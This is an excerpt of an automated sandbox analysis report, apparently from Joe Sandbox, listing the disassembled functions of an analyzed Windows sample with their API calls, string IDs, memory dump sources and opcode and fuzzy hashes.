                                    • Part of subcall function 00357620: _wcslen.LIBCMT ref: 00357625
                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003C4ED4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Connection_wcslen
                                  • String ID: *$LPT
                                  • API String ID: 1725874428-3443410124
                                  • Opcode ID: a4ef737526b5496ba0efa11d948ddaefee432cdbc673dea06b53c659b801c872
                                  • Instruction ID: 8d4ccaf39fcc625ab49ff44e30ae15da1d23647103a6c1e8a814f3ba5cd0998f
                                  • Opcode Fuzzy Hash: a4ef737526b5496ba0efa11d948ddaefee432cdbc673dea06b53c659b801c872
                                  • Instruction Fuzzy Hash: 95917C75A002049FCB16DF58C494FAABBF5AF44304F19809DE84A9F3A2D735ED85CB90
                                  Function 0037E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 0037E30D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: e15acfcc9e897a9892134f5535fd79a42a01b80d5722aed5183d26e02e2f3d0d
                                  • Instruction ID: 6858a586473a3acde0e31e22d63a6fda5294ebce8f8606f1763e0a1c9781a95a
                                  • Opcode Fuzzy Hash: e15acfcc9e897a9892134f5535fd79a42a01b80d5722aed5183d26e02e2f3d0d
                                  • Instruction Fuzzy Hash: B6515861A1C302D6DB337714C9013BA3BA9AB54740F35CDE8E099872B9EB39CC95DB46
                                  Function 003D7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  • CharUpperBuffW.USER32(003A569E,00000000,?,003ECC08,?,00000000,00000000), ref: 003D78DD
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  • CharUpperBuffW.USER32(003A569E,00000000,?,003ECC08,00000000,?,00000000,00000000), ref: 003D783B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: BuffCharUpper$_wcslen
                                  • String ID: <sA
                                  • API String ID: 3544283678-3623460565
                                  • Opcode ID: b6a501a475306c988160ad1ec4b544feb180411afe759fcc4111c904a9b90af2
                                  • Instruction ID: 9bfe99c68a60c8463e9e34d4b87f43dbb3aee36429b2a65387c3bdbe1c1656af
                                  • Opcode Fuzzy Hash: b6a501a475306c988160ad1ec4b544feb180411afe759fcc4111c904a9b90af2
                                  • Instruction Fuzzy Hash: 69617F37914118EACF06EBA4DCA2DFDB378BF14301B544526F942AB1A1FF345A49DBA0
                                  Function 0036E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  • Opcode ID: c0ea68fa73fd4bc3e18960ef1b02488accba1bad0d2f425c3c513185b58e5659
                                  • Instruction ID: b20959fb5a9648cbe0aa1bcf87a418699dda9a1f3021fb8d1c0c533e3de7a06e
                                  • Opcode Fuzzy Hash: c0ea68fa73fd4bc3e18960ef1b02488accba1bad0d2f425c3c513185b58e5659
                                  • Instruction Fuzzy Hash: E4517539500246DFDB1BEF28C091ABA7BA9EF16310F248415EC919F2D0DB359D4ACBA0
                                  Function 0036F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 0036F2A2
                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0036F2BB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: GlobalMemorySleepStatus
                                  • String ID: @
                                  • API String ID: 2783356886-2766056989
                                  • Opcode ID: a9f405967f5c605979bef7effd6aa7893041877262203470af18620cc8fd2329
                                  • Instruction ID: e6283f63230c02a0e80de2a1507b2812d544007149c4801341294608ca9d14e0
                                  • Opcode Fuzzy Hash: a9f405967f5c605979bef7effd6aa7893041877262203470af18620cc8fd2329
                                  • Instruction Fuzzy Hash: C05156714187449BD321AF10EC86BAFBBF8FB84305F81885CF5D9561A5EB308529CB66
                                  Function 003D5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003D57E0
                                  • _wcslen.LIBCMT ref: 003D57EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: BuffCharUpper_wcslen
                                  • String ID: CALLARGARRAY
                                  • API String ID: 157775604-1150593374
                                  • Opcode ID: 8df0271be2595ea41ede9758b540a5121b7e25ec9ada26303c38fbfa7ba7a88d
                                  • Instruction ID: 912d43fb070cf3db4800f5b340f31c1882505ec74da49dd657f3acac5a00cf7e
                                  • Opcode Fuzzy Hash: 8df0271be2595ea41ede9758b540a5121b7e25ec9ada26303c38fbfa7ba7a88d
                                  • Instruction Fuzzy Hash: 9841C232E002159FCB16DFA9D8829FEBBB5FF59314F11406AE505AB391E7349D81CB90
                                  Function 003CD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 003CD130
                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003CD13A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CrackInternet_wcslen
                                  • String ID: |
                                  • API String ID: 596671847-2343686810
                                  • Opcode ID: 24c8d6e23bcdcb56fb390fdcb5194b3d7b3c5ddd24b8f869b7864c8c5b6e8284
                                  • Instruction ID: 6beb14ae8145171eb86389b907ea7be2d5e2e1378b973f9d1bae0d0a634b658b
                                  • Opcode Fuzzy Hash: 24c8d6e23bcdcb56fb390fdcb5194b3d7b3c5ddd24b8f869b7864c8c5b6e8284
                                  • Instruction Fuzzy Hash: A6314171D01109ABCF16EFA4CD86EEEBFB9FF04300F000029F815AA162D731AA46DB50
                                  Function 003E356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • DestroyWindow.USER32(?,?,?,?), ref: 003E3621
                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E365C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$DestroyMove
                                  • String ID: static
                                  • API String ID: 2139405536-2160076837
                                  • Opcode ID: fb04ff82b032cd46a77925b21f8eaa0b2bcf0a16df2c39141fcd1d45610bb8c2
                                  • Instruction ID: 7f7478c992002006f003f58c21949a4be56f52ac4d3c6871e97a3ef4c86994c4
                                  • Opcode Fuzzy Hash: fb04ff82b032cd46a77925b21f8eaa0b2bcf0a16df2c39141fcd1d45610bb8c2
                                  • Instruction Fuzzy Hash: D431BE71110254AEDB229F39CC85FFB73A9FF88720F019619F8A5972D0DA30AD81C760
                                  Function 003E4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 003E461F
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E4634
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: '
                                  • API String ID: 3850602802-1997036262
                                  • Opcode ID: 0f623007929479f361faa57bccb7f51b391850c71959e42cfcc949dd2101f62c
                                  • Instruction ID: a2bfbf95df05e39c135ed0743418738b86cc37fb3e48581c3eed4ee46f55e161
                                  • Opcode Fuzzy Hash: 0f623007929479f361faa57bccb7f51b391850c71959e42cfcc949dd2101f62c
                                  • Instruction Fuzzy Hash: 30313974A003599FDF15CFAAC980BDABBB9FF0A300F15416AE904AB391D770A941CF90
                                  Function 003E31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E327C
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E3287
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: Combobox
                                  • API String ID: 3850602802-2096851135
                                  • Opcode ID: ece5f1c9b7fe7d90d21c4823c6f73f8d40d24896f399471ae0864ce2c63af099
                                  • Instruction ID: 04270097103e104af0419b7911d7d4e58f596f758f211fdb1b87a3f94dc5097f
                                  • Opcode Fuzzy Hash: ece5f1c9b7fe7d90d21c4823c6f73f8d40d24896f399471ae0864ce2c63af099
                                  • Instruction Fuzzy Hash: D411D0713002586FEF229E55DC88EAB37AAEB943A4F110624FA589B2D0D6319D518760
                                  Function 003E3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0035600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035604C
                                    • Part of subcall function 0035600E: GetStockObject.GDI32(00000011), ref: 00356060
                                    • Part of subcall function 0035600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035606A
                                  • GetWindowRect.USER32(00000000,?), ref: 003E377A
                                  • GetSysColor.USER32(00000012), ref: 003E3794
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                  • String ID: static
                                  • API String ID: 1983116058-2160076837
                                  • Opcode ID: fd0cbc8b63fafdee171d7be42d87232befe291172b2bbb7dc329aa12692de48b
                                  • Instruction ID: ef481d5a941d795fb5f0978f78c2ef560e3bd7dc86a744715c1bb815089895a8
                                  • Opcode Fuzzy Hash: fd0cbc8b63fafdee171d7be42d87232befe291172b2bbb7dc329aa12692de48b
                                  • Instruction Fuzzy Hash: 521159B2610259AFDF12DFA8CC4AEEE7BB8EB08314F014624F955E3290D734E8119B50
                                  Function 003CCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003CCD7D
                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003CCDA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Internet$OpenOption
                                  • String ID: <local>
                                  • API String ID: 942729171-4266983199
                                  • Opcode ID: b6a93fdbb33c5031e22fff9d03bf6aa1b3a12fb7076beb22452eafc4d3554562
                                  • Instruction ID: 4b44ec30c2f16bc8c1fb205ebce60a7b827b9905848c7449064610f66f4e1a05
                                  • Opcode Fuzzy Hash: b6a93fdbb33c5031e22fff9d03bf6aa1b3a12fb7076beb22452eafc4d3554562
                                  • Instruction Fuzzy Hash: 5811E371621632BAD7364A668C88FE7BE6CEB127A4F01522AF10EC2180D2709C41D7F0
                                  Function 003E3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowTextLengthW.USER32(00000000), ref: 003E34AB
                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E34BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LengthMessageSendTextWindow
                                  • String ID: edit
                                  • API String ID: 2978978980-2167791130
                                  • Opcode ID: 528e4996f91ae34e20cf7e1d41e5c83cf4d8366086508b7801ab8bf14a67a650
                                  • Instruction ID: fdd670ba1a7744017b7ed85548d47e7bb9b980d938243b992644ad38288e2365
                                  • Opcode Fuzzy Hash: 528e4996f91ae34e20cf7e1d41e5c83cf4d8366086508b7801ab8bf14a67a650
                                  • Instruction Fuzzy Hash: D411BF71100198ABEB234E66DC88EFB376EEB05374F914324F960971E0C731DD519B50
                                  Function 003B6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • CharUpperBuffW.USER32(?,?,?), ref: 003B6CB6
                                  • _wcslen.LIBCMT ref: 003B6CC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$BuffCharUpper
                                  • String ID: STOP
                                  • API String ID: 1256254125-2411985666
                                  • Opcode ID: 1e40d34e28e6420eeb3941ddb9d66ddbc9a9fe1d27d05e27be714e3c832288cd
                                  • Instruction ID: b66325f57f15381f7f8d0ab608d7ab7f269ef6e326085dc6b17ad8a12b58445a
                                  • Opcode Fuzzy Hash: 1e40d34e28e6420eeb3941ddb9d66ddbc9a9fe1d27d05e27be714e3c832288cd
                                  • Instruction Fuzzy Hash: 4E012B326005268BCB239FBDCC929FF37B9FB617187010539EA5297596EB39DC04C650
                                  Function 003B1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                    • Part of subcall function 003B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 003B3CCA
                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 003B1C46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
